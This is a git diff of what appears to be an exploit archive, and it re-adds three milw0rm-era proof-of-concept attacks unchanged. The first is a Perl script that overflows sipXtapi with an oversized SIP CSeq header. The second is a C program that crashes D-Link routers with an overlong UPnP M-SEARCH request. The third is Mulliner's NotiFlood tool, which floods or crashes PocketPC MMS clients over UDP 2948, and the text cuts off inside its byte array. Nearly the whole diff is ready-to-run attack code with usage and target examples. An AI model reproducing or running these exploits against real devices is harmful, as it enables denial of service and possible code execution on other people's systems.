0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; -print "Done.\n"; - -#EoF - -# milw0rm.com [2006-07-10] +#!/usr/bin/perl +# PoC Exploit By mthumann@ernw.de +# Remote Buffer Overflow in sipXtapi + +use IO::Socket; +#use strict; + + +print "sipXtapi Exploit by Michael Thumann \n\n"; + +if (not $ARGV[0]) { + print "Usage: sipx.pl \n"; +exit;} + +$target=$ARGV[0]; +my $source ="127.0.0.1"; +my $target_port = 5060; +my $user ="bad"; +my $eip="\x41\x41\x41\x41"; +my $cseq = +"\x31\x31\x35\x37\x39\x32\x30\x38". +"\x39\x32\x33\x37\x33\x31\x36\x31". +"\x39\x35\x34\x32\x33\x35\x37\x30". +$eip; +my $packet =<\r +Via: SIP/2.0/UDP $target:3277\r +From: "moz"\r +Call-ID: 3121$target\r +CSeq: $cseq\r +Max-Forwards: 70\r +Contact: \r +\r +END + +print "Sending Packet to: " . $target . "\n\n"; +socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); +my $ipaddr = inet_aton($target); +my $sendto = sockaddr_in($target_port,$ipaddr); +send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; +print "Done.\n"; + +#EoF + +# milw0rm.com [2006-07-10] diff --git a/platforms/hardware/dos/2059.cpp b/platforms/hardware/dos/2059.cpp index 17140b0ff..43b23ac24 100755 --- a/platforms/hardware/dos/2059.cpp +++ b/platforms/hardware/dos/2059.cpp @@ -1,87 +1,87 @@ -/* routers affected from eEye's advisory. /str0ke -Routers Affected: -DI-524 Rev A -DI-524 Rev C -DI-524 Rev D -DI-604 Rev E -DI-624 Rev C -DI-624 Rev D -DI-784 Rev A -EBR-2310 Rev A -WBR-1310 Rev A -WBR-2310 Rev A -*/ - -/* - * D-Link Router UPNP DOS PoC - * Written By: ub3rst4r aka DiGiTALST*R - * Tested Against: DI-524 Rev. A - * - * A remote stack overflow exists in a range of wired and wireless D-Link - * routers. This vulnerability allows an attacker to execute privileged code - * on an affected device. Although a stack overflow does exist, debugging this - * vulnerabilty requires additional external hardware. - * - * NOTE: You might need to try sending this twice, or use 239.255.255.250 - * - * Credits: eEye Digital Security - * - */ - -#include -#include -#pragma comment(lib,"ws2_32") - -int main(int argc, char **argv) -{ - WSADATA wsa; - - char buf[896]; - - int sockfd; - struct sockaddr_in serv_addr; - - int ret; - - if (argc < 2) { - printf("Usage: dlinkdos \n"); - return 0; - } - - WSAStartup(MAKEWORD(1,1), &wsa); - - // the main string - memcpy(buf, "M-SEARCH ", 9); - memset(buf+9, 'A', 800); - memcpy(buf+809, " HTTP/1.1\r\n", 10); - - // extra data - strcat(buf, - "Host:239.255.255.250:1900\r\n" - "ST:upnp:rootdevice\r\n" - "Man:\"ssdp:discover\"\r\n" - "MX:3\r\n" - "\r\n" - "\r\n"); - - sockfd = socket(AF_INET, SOCK_DGRAM, 0); - - serv_addr.sin_family = AF_INET; - serv_addr.sin_port = htons(1900); - serv_addr.sin_addr.s_addr = inet_addr(argv[1]); - memset(&serv_addr.sin_zero, '\0', 8); - - ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr)); - if (ret <= 0) { - printf("failed to send request\n"); - return 0; - } - - printf("request sent!\n"); - - WSACleanup(); - - return 0; -} - -// milw0rm.com [2006-07-22] +/* routers affected from eEye's advisory. /str0ke +Routers Affected: +DI-524 Rev A +DI-524 Rev C +DI-524 Rev D +DI-604 Rev E +DI-624 Rev C +DI-624 Rev D +DI-784 Rev A +EBR-2310 Rev A +WBR-1310 Rev A +WBR-2310 Rev A +*/ + +/* + * D-Link Router UPNP DOS PoC + * Written By: ub3rst4r aka DiGiTALST*R + * Tested Against: DI-524 Rev. A + * + * A remote stack overflow exists in a range of wired and wireless D-Link + * routers. This vulnerability allows an attacker to execute privileged code + * on an affected device. Although a stack overflow does exist, debugging this + * vulnerabilty requires additional external hardware. + * + * NOTE: You might need to try sending this twice, or use 239.255.255.250 + * + * Credits: eEye Digital Security + * + */ + +#include +#include +#pragma comment(lib,"ws2_32") + +int main(int argc, char **argv) +{ + WSADATA wsa; + + char buf[896]; + + int sockfd; + struct sockaddr_in serv_addr; + + int ret; + + if (argc < 2) { + printf("Usage: dlinkdos \n"); + return 0; + } + + WSAStartup(MAKEWORD(1,1), &wsa); + + // the main string + memcpy(buf, "M-SEARCH ", 9); + memset(buf+9, 'A', 800); + memcpy(buf+809, " HTTP/1.1\r\n", 10); + + // extra data + strcat(buf, + "Host:239.255.255.250:1900\r\n" + "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" + "\r\n" + "\r\n"); + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = htons(1900); + serv_addr.sin_addr.s_addr = inet_addr(argv[1]); + memset(&serv_addr.sin_zero, '\0', 8); + + ret = sendto(sockfd,buf,sizeof(buf),0,(struct sockaddr *)&serv_addr, sizeof(struct sockaddr)); + if (ret <= 0) { + printf("failed to send request\n"); + return 0; + } + + printf("request sent!\n"); + + WSACleanup(); + + return 0; +} + +// milw0rm.com [2006-07-22] diff --git a/platforms/hardware/dos/2156.c b/platforms/hardware/dos/2156.c index 744bcb07e..db1da1747 100755 --- a/platforms/hardware/dos/2156.c +++ b/platforms/hardware/dos/2156.c @@ -1,225 +1,225 @@ -/* - * This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer - * flood/crash vulnerability (ab)using the WAPPush port UDP:2948 - * - * This is for educational purposes only! Please use responsible! - * - * (c) Collin Mulliner - * http://www.trifinite.org - * http://www.mulliner.org/pocketpc/ - * - * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder - * - *(c) Collin Mulliner - * - * http://www.mulliner.org/pocketpc/ - * http://www.trifinite.org/ - * - **** For educational purposes only! Please use responsible! *** - * - * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC - * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against - * PocketPC Phones". - * - * The tool sends MMS new message notifications to the target PocketPC device over - * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for - * every received notification. If auto receive is enabled the phone will try to - * dial-up GPRS in order to receive the message. After receiving a couple - * hundred messages the phone randomly freezes or rejects new messages. Further - * the MMS inbox is filled up with messages that only can be deleted manually - * one-by-one. In crash mode, each notification crashes the MMS client and - * therefore actively keeps the user from using the Inbox application while - * connected to WiFi (the Inbox application also handles email like via POP3 and - * IMAP). - * - * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0 - * - * Examples: - * flood all clients in 192.168.1/24: - * notiflood -d 192.168.1.255 -n 0 - * - * crash client at: 192.168.42.29: - * notiflood -d 192.168.42.29 -i 500000 -n 1 -c - * - */ - -#include -#include -#include -#include -#include -//#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int mms1_pos[] = {40, 106, 167, 228, 289}; - -unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00}; - -unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00}; - -int mms2_pos[] = { 40, 314, 375, 436, 489 }; - -char to[100] = {"receiver@receiver.com"}; -char from[100] = {"sender@sender.net"}; -char subject[100] = {"Your P0ckEtPC just P00PED itself!"}; - -unsigned int iteration = 0; - -void iterate(unsigned char *nty, int *pos) -{ - char tmp[57]; - char tmp2[57]; - - sprintf(tmp, "%u%u", time(NULL), iteration); - memset(&nty[pos[0]], '0', 57); - memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56); - - sprintf(tmp2, "http://127.0.0.1/?%s",tmp); - memset(&nty[pos[4]], '0', 57); - memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56); -} - - -void init(unsigned char *nty, int *pos) -{ - memset(&nty[pos[1]], ' ', 56); - memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56); - memset(&nty[pos[2]], ' ', 56); - memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56); - memset(&nty[pos[3]], ' ', 56); - memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56); -} - -void usage() -{ - printf(""\ - "notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\ - " (c) 2006 Collin Mulliner \n"\ - " http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\ - " for educational purposes only, please use responsible!\n\n"\ - "options:\n"\ - "\t-d destination ip (broadcast works!)\n"\ - "\t-i interval (useconds)\n"\ - "\t-n number of packets (0=unlimited)\n"\ - "\t-s subject\n"\ - "\t-f from\n"\ - "\t-t to\n"\ - "\t-c crash client\n"\ - "\t-F flip-flop between crash / start client\n"\ - "\t-h help\n"\ - "\t-q quiet\n\n"); - -} - -int main(int argc, char **argv) -{ - int f, i, l = 0; - char system_cmd[200]; - int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop - int opt; - char dest[20] = {0}; - int interval = 500000; - unsigned int num = 0; - int verbose = 1; - int flipflop = 0; - - - while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) { - switch (opt) { - case 'd': - strncpy(dest, optarg, 19); - break; - case 's': - strncpy(subject, optarg, 56); - break; - case 't': - strncpy(to, optarg, 56); - break; - case 'f': - strncpy(from, optarg, 56); - break; - case 'c': - mode = 1; - break; - case 'F': - mode = 2; - break; - case 'n': - num = atoi(optarg); - break; - case 'i': - interval = atoi(optarg); - break; - case 'q': - verbose = 0; - break; - default: - case 'h': - usage(); - break; - } - } - - if (optind < argc) { - usage(); - exit(-1); - } - if (strlen(dest) == 0) { - usage(); - exit(-1); - } - - sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest); - - init(mms1, mms1_pos); - init(mms2, mms2_pos); - - if (verbose) { - printf("to: %s\n", to); - printf("from: %s\n", from); - printf("subject: %s\n", subject); - printf("dst-ip: %s\n", dest); - if (mode == 1) printf("crash client\n"); - else if (mode == 0) printf("fillup client inbox\n"); - else printf("flip-flop mode\n"); - printf("flood interval: %d seconds\n", interval); - printf("number of packets: %d (0=unlimited)\n", num); - } - - if (mode == 2) { - flipflop = 1; - } - - do { - iteration++; - f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666); - if (mode == 0) { // flood - iterate(mms1, mms1_pos); - write(f, mms1, sizeof(mms1)); - } - else if (mode == 1) { // crash - iterate(mms2, mms2_pos); - write(f, mms2, sizeof(mms2)); - } - close(f); - system(system_cmd); - if (flipflop == 1) { - if (mode == 0) mode = 1; - else mode = 0; - } - if (interval > 0) usleep(interval); - } while ((iteration < num && num != 0) || num == 0); - - return(0); -} - -// milw0rm.com [2006-08-09] +/* + * This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer + * flood/crash vulnerability (ab)using the WAPPush port UDP:2948 + * + * This is for educational purposes only! Please use responsible! + * + * (c) Collin Mulliner + * http://www.trifinite.org + * http://www.mulliner.org/pocketpc/ + * + * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder + * + *(c) Collin Mulliner + * + * http://www.mulliner.org/pocketpc/ + * http://www.trifinite.org/ + * + **** For educational purposes only! Please use responsible! *** + * + * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC + * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against + * PocketPC Phones". + * + * The tool sends MMS new message notifications to the target PocketPC device over + * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for + * every received notification. If auto receive is enabled the phone will try to + * dial-up GPRS in order to receive the message. After receiving a couple + * hundred messages the phone randomly freezes or rejects new messages. Further + * the MMS inbox is filled up with messages that only can be deleted manually + * one-by-one. In crash mode, each notification crashes the MMS client and + * therefore actively keeps the user from using the Inbox application while + * connected to WiFi (the Inbox application also handles email like via POP3 and + * IMAP). + * + * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0 + * + * Examples: + * flood all clients in 192.168.1/24: + * notiflood -d 192.168.1.255 -n 0 + * + * crash client at: 192.168.42.29: + * notiflood -d 192.168.42.29 -i 500000 -n 1 -c + * + */ + +#include +#include +#include +#include +#include +//#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int mms1_pos[] = {40, 106, 167, 228, 289}; + +unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00}; + +unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41